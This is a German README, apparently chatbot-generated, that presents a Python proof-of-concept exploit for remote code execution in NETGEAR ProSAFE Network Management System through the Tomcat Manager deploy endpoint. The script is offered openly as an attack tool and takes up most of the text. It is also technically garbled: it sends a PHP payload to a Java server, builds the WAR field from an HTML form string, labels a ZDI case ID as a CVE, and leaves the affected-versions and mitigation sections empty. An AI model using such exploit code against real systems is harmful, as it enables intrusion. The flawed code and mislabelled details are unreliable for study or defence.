
Proof-of-Concept-Exploit, der die Remote-Codeausführung im NETGEAR ProSAFE Network Management System über eine verwundbare Apache-Tomcat-Instanz demonstriert, mit Python-Bereitstellungsskript und Schadensbegrenzungsanleitung.
Hier ist eine strukturierte README.md für den Proof of Concept (PoC) zur Remote Code Execution (RCE)-Schwachstelle im NETGEAR ProSAFE Network Management System:
Dieses Repository enthält ein Proof-of-Concept (PoC)-Skript, das eine Remote Code Execution (RCE)-Schwachstelle im NETGEAR ProSAFE Network Management System demonstriert. Die Schwachstelle ist auf die Verwendung einer anfälligen Version von Apache Tomcat im Produktinstallationsprogramm zurückzuführen. Dieses Problem ermöglicht es authentifizierten Angreifern, beliebigen Code auf betroffenen Installationen auszuführen.
CVE-ID: ZDI-CAN-22868
Übersicht: NETGEAR ProSAFE Network Management System enthält eine Remote Code Execution-Schwachstelle aufgrund der Verwendung einer anfälligen Version von Apache Tomcat. Ein authentifizierter Angreifer kann diese Schwachstelle ausnutzen, um im Kontext von SYSTEM beliebigen Code auf dem betroffenen System auszuführen.
Betroffene Versionen:
Authentifizierung: Erforderlich
Dieses PoC zeigt, wie ein Angreifer die Schwachstelle ausnutzen kann, um eine Remote Code Execution zu erreichen. Der spezifische Fehler liegt im Produktinstallationsprogramm aufgrund der Verwendung einer veralteten oder anfälligen Apache Tomcat-Version.
Das folgende Skript zeigt, wie diese RCE-Schwachstelle ausgenutzt wird. Stellen Sie sicher, dass Sie über die entsprechenden Berechtigungen verfügen, bevor Sie dieses PoC ausführen.
Wichtig: Dieses PoC dient nur zu Bildungszwecken und sollte nicht für unbefugte oder böswillige Aktivitäten verwendet werden.
import requests
# Configuration
target_url = "http://target-ip:port/manager/html" # Change this to the Tomcat Manager URL of the target
username = "admin" # Change to the valid username
password = "password" # Change to the valid password
# The payload to be executed on the remote server
payload = """
<?php
// Payload to execute arbitrary PHP code
system('whoami');
?>
"""
# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"
# Headers for authentication
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
def exploit_rce(url, username, password, payload):
"""
Exploit the RCE vulnerability by deploying a malicious web application.
Args:
url (str): The Tomcat Manager URL.
username (str): The Tomcat Manager username.
password (str): The Tomcat Manager password.
payload (str): The malicious payload to be executed.
"""
try:
# Create a new web application with the malicious payload
response = requests.post(
url,
headers=headers,
data={
"path": "/example",
"war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
},
auth=(username, password)
)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200 and "Deployed application" in response.text:
print("[+] Successfully deployed the malicious web application.")
else:
print("[-] Failed to deploy the malicious web application.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Exploiting RCE vulnerability at: {deploy_url}")
exploit_rce(deploy_url, username, password, payload)
target_url auf die Tomcat-Manager-URL des Zielsystems und aktualisieren Sie username und password mit gültigen Anmeldedaten.exploit_rce() sendet eine POST-Anfrage, um die schädliche Webanwendung bereitzustellen.Um diese Schwachstelle zu beheben, führen Sie die folgenden Schritte durch:
Durch Befolgen dieser Schritte können Sie die RCE-Schwachstelle im NETGEAR ProSAFE Network Management System beheben und die allgemeine Sicherheit verbessern.
Diese README.md bietet eine detaillierte Beschreibung und ein PoC-Skript für die RCE-Schwachstelle, einschließlich Einrichtungsanweisungen, Überlegungen und Abhilfehinweise.